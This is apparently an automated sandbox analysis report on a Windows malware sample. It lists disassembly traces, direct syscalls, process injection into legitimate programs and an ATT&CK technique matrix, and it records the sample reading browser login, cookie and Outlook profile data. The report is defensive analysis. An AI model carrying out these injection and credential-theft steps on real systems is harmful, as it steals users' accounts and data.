          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331051 mov eax, dword ptr fs:[00000030h]2_2_33331051
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331051 mov eax, dword ptr fs:[00000030h]2_2_33331051
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360044 mov eax, dword ptr fs:[00000030h]2_2_33360044
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EB0AF mov eax, dword ptr fs:[00000030h]2_2_333EB0AF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333700A5 mov eax, dword ptr fs:[00000030h]2_2_333700A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A093 mov ecx, dword ptr fs:[00000030h]2_2_3332A093
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332C090 mov eax, dword ptr fs:[00000030h]2_2_3332C090
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332C0F6 mov eax, dword ptr fs:[00000030h]2_2_3332C0F6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336D0F0 mov eax, dword ptr fs:[00000030h]2_2_3336D0F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3336D0F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334B0D0 mov eax, dword ptr fs:[00000030h]2_2_3334B0D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334050B7 mov eax, dword ptr fs:[00000030h]2_2_334050B7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33359723 mov eax, dword ptr fs:[00000030h]2_2_33359723
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333471B mov eax, dword ptr fs:[00000030h]2_2_3333471B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333471B mov eax, dword ptr fs:[00000030h]2_2_3333471B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF717 mov eax, dword ptr fs:[00000030h]2_2_333EF717
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333D700 mov ecx, dword ptr fs:[00000030h]2_2_3333D700
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F970B mov eax, dword ptr fs:[00000030h]2_2_333F970B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F970B mov eax, dword ptr fs:[00000030h]2_2_333F970B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335270D mov eax, dword ptr fs:[00000030h]2_2_3335270D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335270D mov eax, dword ptr fs:[00000030h]2_2_3335270D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335270D mov eax, dword ptr fs:[00000030h]2_2_3335270D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360774 mov eax, dword ptr fs:[00000030h]2_2_33360774
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334779 mov eax, dword ptr fs:[00000030h]2_2_33334779
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334779 mov eax, dword ptr fs:[00000030h]2_2_33334779
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33342760 mov ecx, dword ptr fs:[00000030h]2_2_33342760
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov ecx, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336A750 mov eax, dword ptr fs:[00000030h]2_2_3336A750
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DE750 mov eax, dword ptr fs:[00000030h]2_2_333DE750
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B174B mov eax, dword ptr fs:[00000030h]2_2_333B174B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B174B mov ecx, dword ptr fs:[00000030h]2_2_333B174B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33363740 mov eax, dword ptr fs:[00000030h]2_2_33363740
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336174A mov eax, dword ptr fs:[00000030h]2_2_3336174A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333307A7 mov eax, dword ptr fs:[00000030h]2_2_333307A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FD7A7 mov eax, dword ptr fs:[00000030h]2_2_333FD7A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FD7A7 mov eax, dword ptr fs:[00000030h]2_2_333FD7A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FD7A7 mov eax, dword ptr fs:[00000030h]2_2_333FD7A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33361796 mov eax, dword ptr fs:[00000030h]2_2_33361796
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33361796 mov eax, dword ptr fs:[00000030h]2_2_33361796
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B781 mov eax, dword ptr fs:[00000030h]2_2_3340B781
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B781 mov eax, dword ptr fs:[00000030h]2_2_3340B781
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333377F9 mov eax, dword ptr fs:[00000030h]2_2_333377F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333377F9 mov eax, dword ptr fs:[00000030h]2_2_333377F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E7E0 mov eax, dword ptr fs:[00000030h]2_2_3335E7E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF7CF mov eax, dword ptr fs:[00000030h]2_2_333EF7CF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334017BC mov eax, dword ptr fs:[00000030h]2_2_334017BC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33330630 mov eax, dword ptr fs:[00000030h]2_2_33330630
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360630 mov eax, dword ptr fs:[00000030h]2_2_33360630
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B8633 mov esi, dword ptr fs:[00000030h]2_2_333B8633
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B8633 mov eax, dword ptr fs:[00000030h]2_2_333B8633
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B8633 mov eax, dword ptr fs:[00000030h]2_2_333B8633
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336F63F mov eax, dword ptr fs:[00000030h]2_2_3336F63F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336F63F mov eax, dword ptr fs:[00000030h]2_2_3336F63F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337623 mov eax, dword ptr fs:[00000030h]2_2_33337623
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C mov ecx, dword ptr fs:[00000030h]2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C mov ecx, dword ptr fs:[00000030h]2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C mov eax, dword ptr fs:[00000030h]2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33335622 mov eax, dword ptr fs:[00000030h]2_2_33335622
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33335622 mov eax, dword ptr fs:[00000030h]2_2_33335622
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336C620 mov eax, dword ptr fs:[00000030h]2_2_3336C620
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335D600 mov eax, dword ptr fs:[00000030h]2_2_3335D600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335D600 mov eax, dword ptr fs:[00000030h]2_2_3335D600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF607 mov eax, dword ptr fs:[00000030h]2_2_333EF607
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336360F mov eax, dword ptr fs:[00000030h]2_2_3336360F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404600 mov eax, dword ptr fs:[00000030h]2_2_33404600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33330670 mov eax, dword ptr fs:[00000030h]2_2_33330670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372670 mov eax, dword ptr fs:[00000030h]2_2_33372670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372670 mov eax, dword ptr fs:[00000030h]2_2_33372670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33327662 mov eax, dword ptr fs:[00000030h]2_2_33327662
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33327662 mov eax, dword ptr fs:[00000030h]2_2_33327662
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33327662 mov eax, dword ptr fs:[00000030h]2_2_33327662
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33343660 mov eax, dword ptr fs:[00000030h]2_2_33343660
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33343660 mov eax, dword ptr fs:[00000030h]2_2_33343660
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33343660 mov eax, dword ptr fs:[00000030h]2_2_33343660

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x5506BDD
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x335A488
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x33596B2
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x335A4FB
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x3362BA4
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x3361721
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x335A3C9
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x33617AF
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtCreateThreadEx: Direct from: 0x3358AA4
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x5506C54
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x3361679
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x5506A0E
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x550E82B
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQuerySystemInformation: Direct from: 0x33615CA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe NtQueueApcThread: Indirect: 0x12F5BB
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x335A4B7
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQueryInformationToken: Direct from: 0x3359DE7
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FF9BA9C2651
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x3358247
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x336152E
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtAllocateVirtualMemory: Direct from: 0x33653C9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe NtSetContextThread: Indirect: 0x1337F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe NtSuspendThread: Indirect: 0x133B19
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe NtResumeThread: Indirect: 0x133E39
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FF9841A9E7F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Thread register set: target process: 6612
          Source: C:\Windows\SysWOW64\waitfor.exe Thread register set: target process: 6612
          Source: C:\Windows\SysWOW64\waitfor.exe Thread register set: target process: 532
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Process created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
          Source: C:\Windows\SysWOW64\waitfor.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager|Z5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information

          Source: Yara match File source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\waitfor.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match File source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 321 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
          | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 312 Process Injection | 12 Virtualization/Sandbox Evasion | LSASS Memory | 12 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 6 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
